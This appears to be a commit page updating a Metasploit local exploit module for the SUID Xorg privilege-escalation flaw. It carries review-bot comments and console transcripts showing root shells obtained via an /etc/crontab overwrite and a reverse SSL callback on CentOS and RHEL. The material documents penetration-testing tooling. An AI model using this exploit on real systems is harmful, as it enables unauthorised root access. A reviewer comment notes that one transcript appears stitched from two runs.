Land #11764, update tested versions for xor_x11_suid_server module

master
Brent Cook 2019-04-24 05:11:41 -05:00
commit 9793c839f2
No known key found for this signature in database
GPG Key ID: 1FFAA0B24B708F96
2 changed files with 127 additions and 24 deletions


@ -7,17 +7,20 @@
Xorg (commonly referred as simply X) is the most popular display server among Linux users. Its ubiquity has led to making it an ever-present requisite for GUI applications, resulting in massive adoption from most distributions. Xorg (commonly referred as simply X) is the most popular display server among Linux users. Its ubiquity has led to making it an ever-present requisite for GUI applications, resulting in massive adoption from most distributions.
Xorg is more restrictive to exploit under CentOS. The user must have console lock and SeLinux may interfere. If Selinux is enforcing crontabs context will be changed on exploit and you will be unable to clean it. Xorg is more restrictive to exploit under CentOS / RHEL. The user must have console lock and SeLinux may interfere. If Selinux is enforcing crontabs context will be changed on exploit and you will be unable to clean it.
This module has been tested successfully on: This module has been tested successfully on:
* OpenBSD 6.3 * OpenBSD 6.3
* OpenBSD 6.4 * OpenBSD 6.4
* CentOS 7.4.1708 x86_64
* CentOS 7.5.1084 x86_64 * CentOS 7.5.1084 x86_64
* Red Hat Enterprise Linux 7.5 x86_64
## Verification Steps ## Verification Steps
On CentOS your session must have console lock. To get a console lock you can login locally with a user.
On CentOS/RHEL your session must have console lock. To get a console lock you can login locally with a user.
1. Start `msfconsole` 1. Start `msfconsole`
2. Get a session 2. Get a session
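Review bot: The new tested-versions entry "CentOS 7.5.1084 x86_64" does not match the module description in the second file, which says "CentOS 7.5.1804"; one of the two is a transposition and the doc and module should agree. While touching these lines, the kept sentence "If Selinux is enforcing crontabs context will be changed on exploit and you will be unable to clean it" would read better as "If SELinux is enforcing, the crontab's context will be changed on exploit and you will be unable to clean it", and "SeLinux"/"Selinux" should be spelled "SELinux" consistently across the doc.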
@ -29,12 +32,6 @@
8. You should get a new *root* session 8. You should get a new *root* session
## Options
**SESSION**
Which session to use, which can be viewed with `sessions`
## Advanced Options ## Advanced Options
**Xdisplay** **Xdisplay**
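Review bot: Dropping the "## Options" section removes the only mention of SESSION from the doc, leaving just "## Advanced Options"; since SESSION is the one required datastore option for this local exploit, consider keeping a one-line entry such as "**SESSION** Which session to use, which can be viewed with `sessions`" rather than deleting it.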
@ -43,19 +40,25 @@
**WritableDir** **WritableDir**
A writable directory file system path. (default: `/tmp`) A writable directory file system path (default: `/tmp`)
**ConsoleLock**
**ConsoleLock** Will check for console lock under linux (default: `true`)
Will check for console lock under linux (default: `true`)
## Scenarios ## Scenarios
### OpenBSD
``` ```
msf5 > use exploit/multi/local/xorg_x11_suid_server
msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1 msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1
session => 1 session => 1
msf5 exploit(multi/local/xorg_x11_suid_server) > set lhost 172.30.0.2
lhost => 172.30.0.2
msf5 exploit(multi/local/xorg_x11_suid_server) > set verbose true
verbose => true
msf5 exploit(multi/local/xorg_x11_suid_server) > run msf5 exploit(multi/local/xorg_x11_suid_server) > run
[!] SESSION may not be compatible with this module. [!] SESSION may not be compatible with this module.
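Review bot: The ConsoleLock doc text still reads "Will check for console lock under linux (default: `true`)" while this same commit changes the option description in the module to "Will check for console lock on linux systems"; the doc should quote the same wording as `show advanced`, and "linux" should be capitalized "Linux" in both places. Adding the "### OpenBSD" subheading and the `set lhost` / `set verbose` lines to the scenario is a good consistency improvement against the two new scenarios below.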
@ -89,3 +92,98 @@ msf5 exploit(multi/local/xorg_x11_suid_server) > run
id id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest) uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
``` ```
### CentOS 7.4.1708 x86_64
```
msf5 > use exploit/multi/local/xorg_x11_suid_server
msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1
session => 1
msf5 exploit(multi/local/xorg_x11_suid_server) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf5 exploit(multi/local/xorg_x11_suid_server) > set verbose true
verbose => true
msf5 exploit(multi/local/xorg_x11_suid_server) > run
[*] Started reverse double SSL handler on 172.16.191.188:4444
[*] Running additional check for Linux
[+] Console lock for user
[+] Selinux is not an issue
[+] Xorg path found at /usr/bin/Xorg
[+] Xorg binary /usr/bin/Xorg is SUID
[+] Xorg version 1.19.3 is vulnerable
[!] Xorg in process list
[!] Could not get version or Xorg process possibly running, may fail
[+] Passed all initial checks for exploit
[*] Uploading your payload, this could take a while
[*] Trying /etc/crontab overwrite
[+] /etc/crontab overwrite successful
[*] Waiting on cron to run
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo zk0jobDMxFdBxLBU;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "zk0jobDMxFdBxLBU\n"
[*] Matching...
[*] B is input...
[*] Command shell session 7 opened (172.16.191.188:4444 -> 172.16.191.141:46318) at 2018-11-24 21:31:04 -0500
[*] Waiting on cron to run
[+] Returning session after cleaning
[+] Deleted /tmp/.session-Tafw0iW0r8
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_t:s0-s0:c0.c1023
uname -a
Linux centos-7-1708.localdomain 3.10.0-693.el7.x86_64 #1 SMP Tue Aug 22 21:09:27 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
```
### Red Hat Enterprise Linux 7.5 x86_64
```
msf5 > use exploit/multi/local/xorg_x11_suid_server
msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1
session => 1
msf5 exploit(multi/local/xorg_x11_suid_server) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf5 exploit(multi/local/xorg_x11_suid_server) > set verbose true
verbose => true
msf5 exploit(multi/local/xorg_x11_suid_server) > run
[*] Started reverse double SSL handler on 172.16.191.165:4444
[*] Running additional check for Linux
[+] Console lock for user
[+] Selinux is not an issue
[+] Xorg path found at /usr/bin/Xorg
[+] Xorg binary /usr/bin/Xorg is SUID
[+] Xorg version 1.19.5 is vulnerable
[!] Xorg in process list
[!] Could not get version or Xorg process possibly running, may fail
[+] Passed all initial checks for exploit
[*] Uploading your payload, this could take a while
[*] Trying /etc/crontab overwrite
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo EEdPp66R4es6U3WF;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[+] /etc/crontab overwrite successful. Waiting for job to run (may take a minute)...
[*] Reading from socket B
[*] B: "EEdPp66R4es6U3WF\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (172.16.191.165:4444 -> 172.16.191.228:44978) at 2019-04-21 06:29:04 -0400
[+] Returning session after cleaning
[+] Deleted /tmp/.session-aqxyug0fH
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_t:s0-s0:c0.c1023
uname -a
Linux red-hat-7-5-x64.local 3.10.0-862.el7.x86_64 #1 SMP Wed Mar 21 18:14:51 EDT 2018 x86_64 x86_64 x86_64 GNU/Linux
cat /etc/redhat-release
Red Hat Enterprise Linux Server release 7.5 (Maipo)
```
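Review bot: The CentOS 7.4.1708 transcript is internally inconsistent: `set lhost 172.16.191.165` is shown, but the handler line reports "Started reverse double SSL handler on 172.16.191.188:4444" and the session opens on 172.16.191.188, so the output appears to be stitched from two runs; re-capture it from a single run, or at least make the `lhost` value match the handler line. The RHEL transcript, by contrast, is self-consistent (172.16.191.165 throughout) and additionally shows `cat /etc/redhat-release`; adding the equivalent `cat /etc/centos-release` line to the CentOS scenario would make the two sections parallel.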


@ -5,6 +5,7 @@
class MetasploitModule < Msf::Exploit::Local class MetasploitModule < Msf::Exploit::Local
Rank = GoodRanking Rank = GoodRanking
include Msf::Exploit::EXE include Msf::Exploit::EXE
include Msf::Exploit::FileDropper include Msf::Exploit::FileDropper
include Msf::Post::File include Msf::Post::File
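Review bot: `include Msf::Exploit::EXE` is added here, but no other hunk in this diff introduces a call to anything it provides (for example `generate_payload_exe`); if the module already built its ELF payload before this change, that method was being resolved through another mixin, so confirm the include is actually needed rather than incidental, and if it is needed, note in the commit message which existing call depends on it.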
@ -13,21 +14,25 @@ class MetasploitModule < Msf::Exploit::Local
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'Xorg X11 Server SUID privilege escalation', 'Name' => 'Xorg X11 Server SUID logfile Privilege Escalation',
'Description' => %q{ 'Description' => %q{
This module attempts to gain root privileges with SUID Xorg X11 server This module attempts to gain root privileges with SUID Xorg X11 server
versions 1.19.0 < 1.20.3. versions 1.19.0 < 1.20.3.
A permission check flaw exists for -modulepath and -logfile options when A permission check flaw exists for -modulepath and -logfile options when
starting Xorg. This allows unprivileged users that can start the server starting Xorg. This allows unprivileged users that can start the server
the ability to elevate privileges and run arbitrary code under root the ability to elevate privileges and run arbitrary code under root
privileges. privileges.
This module has been tested with OpenBSD 6.3, 6.4, and CentOS 7 (1708). This module has been tested with OpenBSD 6.3, 6.4, CentOS 7.4.1708, and
CentOS default install will require console auth for the users session. CentOS 7.5.1804, and RHEL 7.5. The default PAM configuration for CentOS
Cron launches the payload so if Selinux is enforcing exploitation and RHEL systems requires console auth for the user's session to start
the Xorg server.
Cron launches the payload, so if SELinux is enforcing, exploitation
may still be possible, but the module will bail. may still be possible, but the module will bail.
Xorg must have SUID permissions and may not start if running.
Xorg must have SUID permissions and may not start if already running.
On exploitation a crontab.old backup file will be created by Xorg. On exploitation a crontab.old backup file will be created by Xorg.
This module will remove the .old file and restore crontab after This module will remove the .old file and restore crontab after
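Review bot: The reworded tested-versions sentence has a stray conjunction: "OpenBSD 6.3, 6.4, CentOS 7.4.1708, and CentOS 7.5.1804, and RHEL 7.5" should drop the first "and". The same sentence is also the source of the 7.5.1804 vs 7.5.1084 mismatch with the documentation file in this commit; pick the correct build number and use it in both. The capitalization "SELinux" introduced here is right, and the doc file should be brought in line with it rather than the other way round.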
@ -41,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Local
'Narendra Shinde', # Discovery and exploit 'Narendra Shinde', # Discovery and exploit
'Raptor - 0xdea', # Modified exploit for cron 'Raptor - 0xdea', # Modified exploit for cron
'Aaron Ringo', # Metasploit module 'Aaron Ringo', # Metasploit module
'bcoles' # Metasploit module 'bcoles' # Metasploit module
], ],
'DisclosureDate' => 'Oct 25 2018', 'DisclosureDate' => 'Oct 25 2018',
'References' => 'References' =>
@ -80,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Local
[ [
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ]), OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ]),
OptBool.new('ConsoleLock', [ true, 'Will check for console lock under linux', true ]) OptBool.new('ConsoleLock', [ true, 'Will check for console lock on linux systems', true ])
] ]
) )
end end
@ -168,7 +173,7 @@ class MetasploitModule < Msf::Exploit::Local
check_status = check check_status = check
if check_status == CheckCode::Appears if check_status == CheckCode::Appears
print_warning 'Could not get version or Xorg process possibly running, may fail' print_warning 'Could not get version or Xorg process possibly running, may fail'
elsif check_status == CheckCode::Safe elsif check_status == CheckCode::Safe
fail_with Failure::NotVulnerable, 'Target not vulnerable' fail_with Failure::NotVulnerable, 'Target not vulnerable'
end end
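Review bot: The `CheckCode::Appears` branch prints "Could not get version or Xorg process possibly running, may fail" unconditionally, but both new transcripts in the doc show "[+] Xorg version 1.19.3 is vulnerable" (and 1.19.5 for RHEL) immediately followed by "[!] Xorg in process list" and then this warning, so in practice the version was obtained and only the running-process condition applied. Since this hunk only re-indents the branch, consider using the opportunity to split the message so the warning states which of the two conditions actually triggered `Appears`, for example by having `check` return a reason alongside the code or by printing the "Could not get version" half only when the version lookup really failed.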